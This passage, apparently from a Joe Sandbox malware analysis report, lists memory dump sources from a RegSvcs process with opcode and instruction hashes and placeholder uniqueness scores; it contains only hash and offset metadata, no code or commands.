                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0feaf926f689a009075ed1b458d410f978d4d9666123d1249c76da90cf53c79b
                                                                                                                            • Instruction ID: d6f13cac1a20e03d03ebcb094558bfd751bcc845f9b41d243c0c516e184893ad
                                                                                                                            • Opcode Fuzzy Hash: 0feaf926f689a009075ed1b458d410f978d4d9666123d1249c76da90cf53c79b
                                                                                                                            • Instruction Fuzzy Hash: D1F0B470E08244CFD702CB78C0147ACBFB2AF8A312F59809AE151B7292DB34D841CB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5729b5261f4c2d1063b0b4e9d85553a79620b6d7b02d727b7c78fd85a4202fbc
                                                                                                                            • Instruction ID: 89a6a15fb625c1024307f894db6873b8ec2b3610db1ea85d2aa7aa69cb2aa4db
                                                                                                                            • Opcode Fuzzy Hash: 5729b5261f4c2d1063b0b4e9d85553a79620b6d7b02d727b7c78fd85a4202fbc
                                                                                                                            • Instruction Fuzzy Hash: CFE09BB1909104AFD741DB598D414997BA69F45204B11C2FAD40CDB212EE32DA01ABD1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aea5180b42d9c3712080e38ced788e0840a8e83c37a80f1dffdc5abc6864032e
                                                                                                                            • Instruction ID: 83015d0a8899b8a95dce1840127d581b80dda51aaf01b1c3445147ede570e7ae
                                                                                                                            • Opcode Fuzzy Hash: aea5180b42d9c3712080e38ced788e0840a8e83c37a80f1dffdc5abc6864032e
                                                                                                                            • Instruction Fuzzy Hash: B5F06D36944009CFCB06EFE8C955ADDBFB2FF44304F18C165C1066B311EA345D869B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 05e21bc2ee6209909aadbf0210080e5e22ce0dab50298af6f070642e14d84f84
                                                                                                                            • Instruction ID: 33361946f5b3cbf3272069fe41659d1c602a1358b55e28dc1bcd058008084d1c
                                                                                                                            • Opcode Fuzzy Hash: 05e21bc2ee6209909aadbf0210080e5e22ce0dab50298af6f070642e14d84f84
                                                                                                                            • Instruction Fuzzy Hash: 7EE0DF64B80218EBE780DAE08881B9A22E2B749A40F149100DA19AB3E5D524C8028BB0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7e13312d02665fa7a766cbdc213324e6cff36b0e4168dfe2777c81648daa0dc3
                                                                                                                            • Instruction ID: 9ea64d9251e43d997c335ded0e77eb05c825617bf11ed06e096bb45889f02481
                                                                                                                            • Opcode Fuzzy Hash: 7e13312d02665fa7a766cbdc213324e6cff36b0e4168dfe2777c81648daa0dc3
                                                                                                                            • Instruction Fuzzy Hash: 6DE020794083506FC759CF549C508A2BF69FBD52007088D8FF88157203C611DC0BCBB5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: af11cecbc3638c14cab70815e6b66dd33a1ae07952cc855477ad22dd2878bc46
                                                                                                                            • Instruction ID: 0f44c70991ab765613b57fb0d911e1e4b66e4b31a02ce62e83f6aa5b0936f5fe
                                                                                                                            • Opcode Fuzzy Hash: af11cecbc3638c14cab70815e6b66dd33a1ae07952cc855477ad22dd2878bc46
                                                                                                                            • Instruction Fuzzy Hash: 49E0923040C7889EC701BBF8C8504A5BFB4AE83200B6885CFD8C98B163EB22E581D791
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b11e5eb5e97db6143949dda056294db5ae0287c65351cafad20744ea8e8832d
                                                                                                                            • Instruction ID: 1e5e3ade5cf1f5f25df629372498728881f144f826bbc0210c87df2b156ef73c
                                                                                                                            • Opcode Fuzzy Hash: 9b11e5eb5e97db6143949dda056294db5ae0287c65351cafad20744ea8e8832d
                                                                                                                            • Instruction Fuzzy Hash: 37E04F74D08905DAE7409BB4C8417BDBBF0A709304F20C61AE10E96341D6B956816B52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 89c94b876014efe97cf23616f2b1f4d9cf0b4dbe945091336e3cbf774d9222a5
                                                                                                                            • Instruction ID: d9c2943d1f678cd8363148eaa4c82380405d065d98855909674aff2bff511b41
                                                                                                                            • Opcode Fuzzy Hash: 89c94b876014efe97cf23616f2b1f4d9cf0b4dbe945091336e3cbf774d9222a5
                                                                                                                            • Instruction Fuzzy Hash: 06E0C23110C3805FC381CE54D8008A2FFA9AB9B230708C4CFE8818B343C621DC06DBB2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 135724d88acd5ca85d0bdc71325b38f431173729461c63fcd527a193d0448c10
                                                                                                                            • Instruction ID: 8c474bf8f07d81213437da3ad84176a638150056ac772531d50c4af9d83eecc8
                                                                                                                            • Opcode Fuzzy Hash: 135724d88acd5ca85d0bdc71325b38f431173729461c63fcd527a193d0448c10
                                                                                                                            • Instruction Fuzzy Hash: C6E0C231814B0989C701FFA8C4518A9B7B4EE95200B00C69EE8986B222FB31E6D5CA81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ee6851ead1fdc8dad0be9c150eddd067884f8928b7a072780bb6566b4cf16e93
                                                                                                                            • Instruction ID: 5bb5fb2cdb09a58b9bae0faf9ec0f84186e2b605b1f614a1be50ece66cdd88c0
                                                                                                                            • Opcode Fuzzy Hash: ee6851ead1fdc8dad0be9c150eddd067884f8928b7a072780bb6566b4cf16e93
                                                                                                                            • Instruction Fuzzy Hash: 74E0E531814B0989C700FFA8C8518A9F7B4EF95200F00C78EE8886B222FB31E6D1CA81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7b0db60f4a9b0698be9aea19b5f22dbe4bbcaf9557b29a018bf7e6a8f881f07a
                                                                                                                            • Instruction ID: 9ce712b2c670b49ac489b29deef341d7d28081dddebb91c1f98d563ca7e37153
                                                                                                                            • Opcode Fuzzy Hash: 7b0db60f4a9b0698be9aea19b5f22dbe4bbcaf9557b29a018bf7e6a8f881f07a
                                                                                                                            • Instruction Fuzzy Hash: 3AE0B834F805159FD7049F948696B9EBBF27B5CB00F609094D9127B395CB719D02CBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c30a8d07d40c845f416b3f60f067fecbd864bf63ba3c2d95a16153f4e27466eb
                                                                                                                            • Instruction ID: a93cba74481035a567a13291518bc56b32e4354a5bb99cd98f1eb762f9301cf0
                                                                                                                            • Opcode Fuzzy Hash: c30a8d07d40c845f416b3f60f067fecbd864bf63ba3c2d95a16153f4e27466eb
                                                                                                                            • Instruction Fuzzy Hash: 33E012F0B85611DFFFA50624402453DB196ABD9710725C62985575A394DA74EC41CBC1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aba1520ae4687cb1943111a6e3cd42a2f44ee183ef96ed672eaedab23c747760
                                                                                                                            • Instruction ID: 876d1b53291f309ca2a59a8ecea6206b6cb76778d9f873c807af047e1e2f80ec
                                                                                                                            • Opcode Fuzzy Hash: aba1520ae4687cb1943111a6e3cd42a2f44ee183ef96ed672eaedab23c747760
                                                                                                                            • Instruction Fuzzy Hash: 98E08675D4F680DFD3029BB4A9555653FB5FB4F2413558899D04547261C7784803D711
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ea21cffedb02d0b3eeaf1c581f7fad56db0f2658ea70b6f518048839210f25c8
                                                                                                                            • Instruction ID: 93d1e1743cb9f73658eac6f304e88fc885569383c79e29be8e6b4d144fd19579
                                                                                                                            • Opcode Fuzzy Hash: ea21cffedb02d0b3eeaf1c581f7fad56db0f2658ea70b6f518048839210f25c8
                                                                                                                            • Instruction Fuzzy Hash: E4E046B8900204CBEB009F98E808B5CB7B1EB88305F11C058D119971A4C378DE88CF04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 107cdc477bf78403dd81207a0d9c151efa60f5aff05713a5946523d3019f3161
                                                                                                                            • Instruction ID: b322ffb2396035f7494a30a02fbb382c355d7170b249f12daee0089916d2108e
                                                                                                                            • Opcode Fuzzy Hash: 107cdc477bf78403dd81207a0d9c151efa60f5aff05713a5946523d3019f3161
                                                                                                                            • Instruction Fuzzy Hash: 60D0A734D08608DFD700BBF8CC066AABBF59748B02F50C534D50B5B304EF706844A5A3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 929c7c278d34a170d3df742bc6247be5cf173173ba5a981e5ce1e7616e83ff15
                                                                                                                            • Instruction ID: c9bebe346c4cd2ac3da3a6f224f1c2a2eb59114303a6f7b15e0c61e065c7346a
                                                                                                                            • Opcode Fuzzy Hash: 929c7c278d34a170d3df742bc6247be5cf173173ba5a981e5ce1e7616e83ff15
                                                                                                                            • Instruction Fuzzy Hash: F0D0A770BC4341BFE3661AB0892676E3BD39B82960F15046DD2638F3C9DD544C02C765
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ac50fc8d046d0f9a1ff98133a104b10bbc1480aa3e4656fafaf98f39e23f53bd
                                                                                                                            • Instruction ID: 50dce16e0e87250dce6a7301ef3bff12ef61f4ba6ab2d0793f0533ee79e77c1d
                                                                                                                            • Opcode Fuzzy Hash: ac50fc8d046d0f9a1ff98133a104b10bbc1480aa3e4656fafaf98f39e23f53bd
                                                                                                                            • Instruction Fuzzy Hash: 5EE0C2B8A05300EFE308DB60E85AB6577A2FB89709F34801CE5425A3C3D7B15D02DB01
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 26f6676c1a4ae28d346f80588eb8fb220bb46c65b438c04f6759368818bfc3a6
                                                                                                                            • Instruction ID: 1e937fc577721741c25cf98bb26804c36c197241c882be07a9af520c79037f58
                                                                                                                            • Opcode Fuzzy Hash: 26f6676c1a4ae28d346f80588eb8fb220bb46c65b438c04f6759368818bfc3a6
                                                                                                                            • Instruction Fuzzy Hash: 0AD0C730B402408FEB648FA0D42476837E3AB88B10F20C854AA069B388CB795D42CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a10658695a9e953ddc8bee334beb8f4d0b6a64731ac1dcc1b74376a450302d64
                                                                                                                            • Instruction ID: e8a9fd2a7c58b9395ebce113d67d4f06462b3480942eef29bf7d7893098c908e
                                                                                                                            • Opcode Fuzzy Hash: a10658695a9e953ddc8bee334beb8f4d0b6a64731ac1dcc1b74376a450302d64
                                                                                                                            • Instruction Fuzzy Hash: 0DD0C77194510CAE8B15DFF899418DE7BF59F45300B1047FED409D7611E9714A149B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e519345ec9b012bfc395e87fc0822261c4a33122d616da9b245b991f638256ef
                                                                                                                            • Instruction ID: 549fe30ddeff5b735a5886cd57e554423cbfdefb3e4c6497ced0ba6bd0b226ea
                                                                                                                            • Opcode Fuzzy Hash: e519345ec9b012bfc395e87fc0822261c4a33122d616da9b245b991f638256ef
                                                                                                                            • Instruction Fuzzy Hash: AED0C97194110CAF8B04DFE89A018DEBBEDDB49200B5086FA9508D7211FD325A1097D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9bca63931b5bf0adde1ee8df195e553df1f3245bb20d22b6bba6029b4999f081
                                                                                                                            • Instruction ID: 4565025f28fc256174af24ade86436c76d028fc1cae6a8f12a4bec0419c52476
                                                                                                                            • Opcode Fuzzy Hash: 9bca63931b5bf0adde1ee8df195e553df1f3245bb20d22b6bba6029b4999f081
                                                                                                                            • Instruction Fuzzy Hash: CAD09E314147099AC700FBA8D851855F7B8EFD5210B14C65EE84D5B222EB71E691D681
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2e9e70e112c78e3611e2befc3e86731e6a4d30c05f1c31a8a14654038e5178c6
                                                                                                                            • Instruction ID: 0c9f5eeaeaa8ba0c5f1b39dec1a12c4b8e19410004183955c92344f46f151c7c
                                                                                                                            • Opcode Fuzzy Hash: 2e9e70e112c78e3611e2befc3e86731e6a4d30c05f1c31a8a14654038e5178c6
                                                                                                                            • Instruction Fuzzy Hash: 7BD09E386413559BE315DBA4D5067393677EB44705F104424D50557785C67A5C43DB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e1141f07ded4db1ede8ad64e3fe6ccab5ab7d4125f10f9298188c1b1830205cf
                                                                                                                            • Instruction ID: c081fa3f635c6b7f0e9ea09ab4290ee6b8f433b3e61d5d3e5a18126fd074cf87
                                                                                                                            • Opcode Fuzzy Hash: e1141f07ded4db1ede8ad64e3fe6ccab5ab7d4125f10f9298188c1b1830205cf
                                                                                                                            • Instruction Fuzzy Hash: 42C080355045C0DFC70696B8ED1C6753F717B45301F54C535DE0595171DF701516726B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 662c9499a75d4d8968a37e8f15af443b50bcc4d973846ae9fc51a648561a355a
                                                                                                                            • Instruction ID: e27e8f8890b95352f64b2fdc2415a56003122d47359ec71e080460334421b98e
                                                                                                                            • Opcode Fuzzy Hash: 662c9499a75d4d8968a37e8f15af443b50bcc4d973846ae9fc51a648561a355a
                                                                                                                            • Instruction Fuzzy Hash: 88C08C31804A88EBC600A2B8CC1CA2A7B78A745301F00C830DA0652260AF606902619B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 178ca4f5ed303a108415403d2a56211cfefc8e05268e997cd3e4640d23317cd3
                                                                                                                            • Instruction ID: ede007d80a40a3a940169f6a7defbe4303d8a2763c479d96b4b3356f8db7fa6c
                                                                                                                            • Opcode Fuzzy Hash: 178ca4f5ed303a108415403d2a56211cfefc8e05268e997cd3e4640d23317cd3
                                                                                                                            • Instruction Fuzzy Hash: 32C08C2204F2840FC70273B8296A0983B148825200340C4F2F08C4F423D8000842CB82
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2e1d9eb2d4b5b27d1b425c997b292764f5619270587b9f5ac1557b6487ec3fa1
                                                                                                                            • Instruction ID: 6fc4ef80c6492e38204d947abf86d407ae0812606c3f179bf32476e74aeb1d7c
                                                                                                                            • Opcode Fuzzy Hash: 2e1d9eb2d4b5b27d1b425c997b292764f5619270587b9f5ac1557b6487ec3fa1
                                                                                                                            • Instruction Fuzzy Hash: 79C0CA30C14608CFEB04CA90C0406AEB772BB98308F448A24C816A2200C3B428008BA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0263cae5a2631af5c068f293761467d8ec5fb52d1b441ad7f7f5d8af533993d3
                                                                                                                            • Instruction ID: 1cabf54e04420defedab44810fed552b7466116f9aca424113e816face80645e
                                                                                                                            • Opcode Fuzzy Hash: 0263cae5a2631af5c068f293761467d8ec5fb52d1b441ad7f7f5d8af533993d3
                                                                                                                            • Instruction Fuzzy Hash: 0EC092B4A4611A8FEB50DF28D6083BC7BF1FB54350F00889AD249D3240EB7E2E438B60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0bf8223f31447a840d176cc3a06e24754e73e69d90dbd707b5981599a109b83a
                                                                                                                            • Instruction ID: 8dd815886ef38fd8d72e0ff58bb2512cf1226b182e33b4daf6dc2ceb958b9956
                                                                                                                            • Opcode Fuzzy Hash: 0bf8223f31447a840d176cc3a06e24754e73e69d90dbd707b5981599a109b83a
                                                                                                                            • Instruction Fuzzy Hash: 63B01279201007CBE30CAE04D148B143723B704230F214A11C00AC2600D728EA32C7B1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1cb0d95ad2f5588752d67e9e5dc04c23ad404b8bf5d5c26ff0c2faffa274fa6b
                                                                                                                            • Instruction ID: 661b53b8f32b823fde660132f9d37af506c11818fcef7a29ccc111b9492afa55
                                                                                                                            • Opcode Fuzzy Hash: 1cb0d95ad2f5588752d67e9e5dc04c23ad404b8bf5d5c26ff0c2faffa274fa6b
                                                                                                                            • Instruction Fuzzy Hash: 08B012302040004BA285F60CC840418B7619FC4204314C0ACA449CB315CF33ED03C744
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 198afc99e6253e469ec2c4740da243f8013dcfb677a4a28a7d0aae49d8f74b17
                                                                                                                            • Instruction ID: 10d32368fa1ada8ea593ab07bc965385d83aa73b7e26fc14731ebf02fedace5c
                                                                                                                            • Opcode Fuzzy Hash: 198afc99e6253e469ec2c4740da243f8013dcfb677a4a28a7d0aae49d8f74b17
                                                                                                                            • Instruction Fuzzy Hash: 8EB002746050115B8645EA58D551414B7519FC5215714C5BD6419CB255CF33E9039A44
                                                                                                                            Uniqueness

